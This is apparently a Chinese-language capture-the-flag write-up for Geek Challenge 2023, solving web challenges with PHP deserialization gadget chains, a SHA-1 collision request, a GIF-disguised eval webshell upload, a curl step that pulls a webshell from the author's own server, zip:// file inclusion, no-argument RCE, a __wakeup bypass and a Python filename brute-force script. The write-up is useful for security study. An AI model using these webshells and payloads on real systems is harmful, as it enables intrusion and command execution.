
极客挑战2023部分wp

web

ezhttp

极客挑战2023部分wp_CTF

easy_php

POST /?syc=welcome%20to%20GEEK%202023!&lover=2e4 HTTP/2
Host: sdjmytlkvr9c2362p1nccahfa.node.game.sycsec.com
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1320

qw=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&yxx=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&SYC[GEEK.2023=Happy to see you!

unsign

<?php
class syc
{
    public $cuit;

    /**
     * First link of the gadget chain.
     *
     * On destruction the object treats $cuit as a callable and invokes it
     * with no arguments: a string names a function, an object is routed to
     * its __invoke(). The "action!" marker is printed first so the chain
     * can be traced in the response.
     */
    public function __destruct()
    {
        echo("action!<br>");
        return ($this->cuit)();
    }
}

class lover
{
    public $yxx;
    public $QW;

    /**
     * Second link of the chain.
     *
     * Called when a lover instance is invoked like a function (which is
     * what syc::__destruct does with $cuit). It reads the QW property of
     * whatever $yxx holds; if $yxx is an object without an accessible QW,
     * PHP routes that read to the object's __get().
     */
    public function __invoke()
    {
        echo("invoke!<br>");
        $target = $this->yxx;
        return $target->QW;
    }
}

class web
{
    public $eva1;
    public $interesting;

    /**
     * Final link / sink of the chain.
     *
     * Reading any undefined property on a web instance runs $eva1 as a
     * callable with $interesting as its only argument; the requested
     * property name is ignored and nothing is returned. With
     * eva1='system' and interesting='cat /flag' this is the command
     * execution primitive the writeup uses.
     */
    public function __get($var)
    {
        echo("get!<br>");
        ($this->eva1)($this->interesting);
    }
}


// Build the chain from the sink outwards:
//   syc::__destruct -> lover::__invoke -> web::__get -> system('cat /flag')
$sink = new web();
$sink->eva1 = 'system';
$sink->interesting = 'cat /flag';

$hop = new lover();
$hop->yxx = $sink;

$re = new syc();
$re->cuit = $hop;
// Property order in the output follows the class declarations, so the
// serialized string is the same regardless of assignment order.
echo serialize($re);

url=O:3:"syc":1:{s:4:"cuit";O:5:"lover":2:{s:3:"yxx";O:3:"web":2:{s:4:"eva1";s:6:"system";s:11:"interesting";s:9:"cat /flag";}s:2:"QW";N;}}

n00b_Upload

POST /upload_file.php HTTP/2
Host: cifulezceoeal4ygzuxw06dj5.node.game.sycsec.com
Content-Length: 315
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://cifulezceoeal4ygzuxw06dj5.node.game.sycsec.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqmJNVHRgdkJ76BDI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://cifulezceoeal4ygzuxw06dj5.node.game.sycsec.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

------WebKitFormBoundaryqmJNVHRgdkJ76BDI
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg

GIF89a
<?=eval($_POST['cmd']);?>
------WebKitFormBoundaryqmJNVHRgdkJ76BDI
Content-Disposition: form-data; name="submit"

提交
------WebKitFormBoundaryqmJNVHRgdkJ76BDI--

curl

服务器上准备一个一句话马,然后开一个 http 服务。因为 addr 参数里不能出现冒号,URL 写不了 `http://` 前缀和端口号;curl 对没有 scheme 的地址默认按 http 访问 80 端口,所以 http 服务必须开在 80 端口。

极客挑战2023部分wp_CTF_02

GIF89a
<?=eval($_POST['cmd']);?>

使用curl命令下载到环境里,另存为1.php

addr=-o 1.php xx.xxx.xxx.xxx/shell.php

然后访问

https://qbwtun5kbud0kg20s9fbp7p4f.node.game.sycsec.com/1.php


cmd=system('cat /tmp/Syclover');

极客挑战2023部分wp_php_03

famale_imp_l0ve

一道文件包含题,用到了 zip:// 协议。题目只检查 $file 最后 4 个字符是否为 .jpg,不检查协议和前面的路径,所以 zip://压缩包#cmd.jpg 这种写法既满足后缀限制,又能让 include 读到压缩包里的 PHP 代码。

<?php
  // o2takuXX said this has a problem; the author forgot to look at it.
  header('Content-Type: text/html; charset=utf-8');
// Echo this file's own source to the client (challenge source disclosure).
highlight_file(__FILE__);
// Untrusted: taken straight from the query string, and read before the isset() check.
$file = $_GET['file'];
// Only the last four characters are checked; the stream wrapper and the path
// before the suffix are not. A value like zip://upload/x.zip#cmd.jpg passes the
// check (the writeup uses exactly that) while the included bytes come from
// inside the archive.
if(isset($file) && strtolower(substr($file, -4)) == ".jpg"){
  include($file);
}
  ?>

准备一个压缩包,压缩包的内容是一个cmd.jpg文件,然后文件内容是一句话马,然后压缩成zip文件

极客挑战2023部分wp_极客挑战2023_04

然后通过网站上传之后,用zip协议进行文件包含

https://w0co1yvttngpnhutm4avlaczb.node.game.sycsec.com/include.php?file=zip://upload/1cmd.jpg.zip%23cmd.jpg

极客挑战2023部分wp_极客挑战2023_05

Pupyy_rce

<?php
  // Show this file's own source to the client.
  highlight_file(__FILE__);
header('Content-Type: text/html; charset=utf-8');
// Notices/warnings are hidden, which also masks the odd include below.
error_reporting(0);
// NOTE(review): `flag.php` is unquoted, so PHP parses it as `flag . php`
// (two undefined constants). On PHP 7 that most likely yields the string
// "flagphp" with a suppressed notice; on PHP 8 it throws. Either way the flag
// file is not reliably included here — the writeup finds its name via scandir().
include(flag.php);
// There's something nice in the current directory 😋
if (isset($_GET['var']) && $_GET['var']) {
  $var = $_GET['var'];

  // Blocklist on the raw input (case-insensitive): any occurrence of
  // env/var/session/header is rejected, which takes out e.g. getenv(),
  // get_defined_vars(), session_id() and getallheaders().
  if (!preg_match("/env|var|session|header/i", $var,$match)) {
    // "No-parameter RCE" gate: remove nested calls of the form f(g(h())) —
    // the (?R) recursion allows any depth, but the only permitted argument is
    // another such call — and accept only if a lone ';' remains.
    if (';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $var)){
      eval($_GET['var']);
    }
    else die("WAF!!");
  } else{
    die("PLZ DONT HCAK ME😅");
  }
}

这道题考点还是无参数RCE吧

print_r(scandir(getcwd()));获取一下当前路径下的文件

极客挑战2023部分wp_CTF_06

发现flag文件在数组的第四个位置,倒数第五个位置,用数组逆向也不太好操作,又把var和session、header给ban了,看了看对数组的一些操作 array_rand这个函数可以随机返回一个数组的键名

极客挑战2023部分wp_php_07

这里已经是得到了flag文件名对应的键了 array_flip这个函数可以交换键值,所以配合array_rand函数就可以获得flag文件名了

极客挑战2023部分wp_php_08

这就好说了,直接show_source,试几次就试到了flag文件

极客挑战2023部分wp_极客挑战2023_09

payload

show_source(array_rand(array_flip(scandir(getcwd()))));

ez_remove

<?php
highlight_file(__FILE__);
class syc{
    public $lover;
    // Sink: whatever string ends up in $lover is executed as PHP when the
    // object is destroyed. The writeup triggers that destruction inside
    // unserialize() itself (array-key overwrite), before the throw below runs.
    public function __destruct()
    {
        eval($this->lover);
    }
}

if(isset($_GET['web'])){
    // Case-insensitive blocklist on the raw payload, so the property name
    // "lover" cannot appear literally; the writeup encodes it as a hex-escaped
    // S: string instead.
    if(!preg_match('/lover/i',$_GET['web'])){
        $a=unserialize($_GET['web']);
        // Thrown unconditionally right after unserialize(): the uncaught Error
        // ends the script as a fatal error, so $a never reaches normal
        // end-of-script destruction. For the chain to work, __destruct has to
        // fire while unserialize() is still running.
        throw new Error("快来玩快来玩~");
    }
    else{
        echo("nonono");
    }
}
?>

这道题首先用到了GC垃圾回收机制绕过throw new Error,然后是用十六进制绕过对lover的过滤,最后是用蚁剑绕过phpinfo里的disable_function。 先上exp

<?php

class syc{
    public $lover;

    /**
     * Local copy of the target's class, kept only so serialize() emits the
     * right class/property names. Destruction evaluates $lover as PHP code.
     */
    public function __destruct()
    {
        $code = $this->lover;
        eval($code);
    }
}




// Gadget whose destructor evaluates the webshell stub.
$a = new syc();
$a->lover = "eval(\$_POST[1]);";

// Wrap it in a two-element array. The writeup later rewrites the second
// element's key from 1 to 0 so that, during unserialize(), it overwrites
// the slot holding the syc object and triggers its destructor early.
$b = [$a, 0];
echo serialize($b);

运行得到

a:2:{i:0;O:3:"syc":1:{s:5:"lover";s:16:"eval($_POST[1]);";}i:1;i:0;}

把结尾的 i:1;i:0; 换成 i:0;i:0;:第二个元素复用了键 0,反序列化时会覆盖掉数组里原来的 syc 对象,该对象引用计数归零被 GC 回收,于是 __destruct 在 throw new Error 之前就被触发。然后用 \6c\6f\76\65\72 替换 lover 绕过正则——注意这种十六进制转义只在大写 S 类型的字符串里生效,属性名要写成 S:5:"\6c\6f\76\65\72"。最后蚁剑连接就好,记得把 https 换成 http,根目录下有一个 f1ger 文件,base64 f1ger 就出来了

Akane!

php的一个反序列化题目

<?php
error_reporting(0);
// Show this file's own source to the client. The highlighted output encodes
// spaces as &nbsp;, so the die() strings below appear verbatim in the page
// only when die() actually runs — which is what the brute-force script keys on.
show_source(__FILE__);
class Hoshino
{
    public $Ruby;
    // Private: its serialized name would be "\0Hoshino\0Aquamarine"; the
    // exploit never needs to set it.
    private $Aquamarine;

    // Entry point of the chain: calls an undefined method on $Ruby. When
    // $Ruby is an Idol (which has no func()), PHP routes this to Idol::__call().
    public function __destruct()
    {
        $this->Ruby->func();
    }
}

class Idol
{
    public $Akane;

    // Resets $Akane on every unserialize(), so an attacker-supplied value only
    // survives if __wakeup does not run (the writeup bumps the serialized
    // property count for that; whether it works depends on the PHP version).
    public function __wakeup()
    {
        $this->Akane = '/var/www/html/The************************.php';
    }

    // Boolean oracle: any unknown method call lists the directory named by
    // $Akane. With a glob:// pattern, the two die() messages reveal whether the
    // pattern matched at least one entry — enough to brute-force the filename.
    public function __call($method,$args)
    {
        $Kana = count(scandir($this->Akane));
        if ($Kana > 0) {
            die('Kurokawa Akane');
        } else {
            die('Arima Kana');
        }
    }
}

$a = unserialize(base64_decode($_GET['tuizi']));

?>

看了一下,考点一个是 __wakeup 的绕过(把序列化串里对象的属性个数改成比实际多,利用 CVE-2016-7124 让 __wakeup 不执行——只对未修复该问题的 PHP 版本有效,打之前先确认目标版本),一个是 glob:// 协议爆破文件名,然后 scandir 函数的返回值是一个数组,利用数组的长度判断字符是否正确。先写一个序列化的 demo

<?php
class Hoshino
{
    public $Ruby;
    // Public here (private on the target) so serialize() emits a plain
    // "Aquamarine" name instead of the "\0Hoshino\0Aquamarine" form.
    public $Aquamarine;

    /** Local copy of the target's class; only the shape matters for serialize(). */
    public function __destruct()
    {
        $ruby = $this->Ruby;
        $ruby->func();
    }
}

class Idol
{
    public $Akane;

    /**
     * Local copy of the target's class, kept so serialize() emits the
     * right names. On the target this resets $Akane on every unserialize().
     */
    public function __wakeup()
    {
        $this->Akane = '/var/www/html/The************************.php';
    }

    /**
     * Directory-listing oracle: lists $Akane and dies with one of two
     * fixed strings depending on whether anything was returned.
     */
    public function __call($method,$args)
    {
        $entries = scandir($this->Akane);
        die(count($entries) > 0 ? 'Kurokawa Akane' : 'Arima Kana');
    }
}



// Idol with a glob:// pattern: scandir() on it becomes a "does anything
// match" oracle on the target.
$idol = new Idol();
$idol->Akane = 'glob:///var/www/html/';

$a = new Hoshino();
$a->Ruby = $idol;
$a2 = serialize($a);

// Bump Hoshino's declared property count from 2 to 3 while only two
// properties follow — the count mismatch is the __wakeup-skip trick.
$b = str_replace(':2:', ':3:', $a2);
echo $b, "\n";
echo base64_encode($b);

//O:7:"Hoshino":3:{s:4:"Ruby";O:4:"Idol":1:{s:5:"Akane";s:21:"glob:///var/www/html/";}s:10:"Aquamarine";N;}
//Tzo3OiJIb3NoaW5vIjozOntzOjQ6IlJ1YnkiO086NDoiSWRvbCI6MTp7czo1OiJBa2FuZSI7czoyMToiZ2xvYjovLy92YXIvd3d3L2h0bWwvIjt9czoxMDoiQXF1YW1hcmluZSI7Tjt9

得到字符串后用python写脚本

import requests
import string
import base64


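s = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_0123456789."

filename = "The"
url = "https://b5q90mpuhbnc7n6u7k0g73glp.node.game.sycsec.com/"


def build_payload(prefix: str) -> str:
    """Return the serialized Hoshino/Idol chain for ``glob:///var/www/html/<prefix>*``.

    Hoshino's declared property count is 3 while only two properties
    (Ruby, Aquamarine) follow — that mismatch is what the writeup relies on
    to keep Idol::__wakeup from resetting $Akane. The ``s:<len>`` field is
    computed from the actual string, so the payload stays well-formed no
    matter how many characters have been recovered (the original hard-coded
    ``25 + num``, which only held while every round found a character).
    """
    akane = f"glob:///var/www/html/{prefix}*"
    return (
        'O:7:"Hoshino":3:{s:4:"Ruby";O:4:"Idol":1:{s:5:"Akane";'
        f's:{len(akane)}:"{akane}";}}s:10:"Aquamarine";N;}}'
    )


def encode_param(payload: str) -> str:
    """Return the ``?tuizi=`` query string for *payload* (base64, as the target expects)."""
    return "?tuizi=" + base64.b64encode(payload.encode("utf-8")).decode("utf-8")


def brute_force(base_url: str, prefix: str, charset: str, max_len: int = 50) -> str:
    """Extend *prefix* one character at a time using the target as an oracle.

    A response containing "Kurokawa Akane" means scandir() of the glob
    returned at least one entry, i.e. the guessed character is correct.
    (The page also echoes its own source via show_source(), but highlighted
    output encodes spaces as &nbsp;, so the plain-text match only hits the
    die() message — presumably; confirm against a live response.)

    Stops as soon as no character in *charset* matches — the name is
    complete, or the oracle stopped answering — instead of continuing with
    a stale prefix, or after *max_len* rounds.

    Returns the recovered prefix.
    """
    for _ in range(1, max_len):
        for ch in charset:
            resp = requests.get(url=base_url + encode_param(build_payload(prefix + ch)))
            if "Kurokawa Akane" in resp.text:
                prefix += ch
                print(len(prefix), prefix)
                break
        else:
            # No candidate matched this round: nothing more to recover.
            break
    return prefix


if __name__ == "__main__":
    filename = brute_force(url, filename, s)
    print(filename)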

这样直接运行就可以爆破出文件名,我这里直接循环次数写的50,懒得数题目里的*号了,爆破结果在过程中能看到

极客挑战2023部分wp_极客挑战2023_10

文件名:TheS4crEtF1AgFi1EByo2takuXX.php

极客挑战2023部分wp_极客挑战2023_11

得到flag SYC{QW410zJgUiSg9oclaL}

crypto

week1

proof_of_work

import hashlib
import itertools

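s = 'mjpIZCsijFpQtaSv'
m = '6c327a60bb4beeea04b037e2c6ec50201be9a9c15351040dae09369717c18263'


def revmd5(suffix=s, target=m, length=4, charset=None):
    """Brute-force the proof-of-work: find ``prefix`` with ``sha256(prefix + suffix) == target``.

    Despite the name (kept for compatibility with the original script) the
    hash is SHA-256, exactly as in the original loop.

    Args:
        suffix: known trailing part of the preimage (the server's nonce).
        target: expected hex digest; compared case-insensitively.
        length: number of unknown leading characters (originally fixed at 4).
        charset: candidate characters; defaults to printable ASCII 0x21..0x7e,
            i.e. the original ``range(33, 127)``.

    Returns:
        The full preimage (prefix + suffix) as a string, or ``None`` if no
        candidate of the given length matches. A hit is also printed, as the
        original did.
    """
    if charset is None:
        charset = [chr(c) for c in range(33, 127)]
    tail = suffix.encode()
    want = target.lower()
    # itertools.product replaces the four nested loops and lets the search
    # stop at the first hit; the original `break` only left the innermost
    # loop and kept hashing the remaining ~78M candidates.
    for combo in itertools.product(charset, repeat=length):
        candidate = ''.join(combo).encode() + tail
        if hashlib.sha256(candidate).hexdigest() == want:
            found = candidate.decode()
            print(found)
            print(want)
            print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
            return found
    return None


if __name__ == "__main__":
    revmd5()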
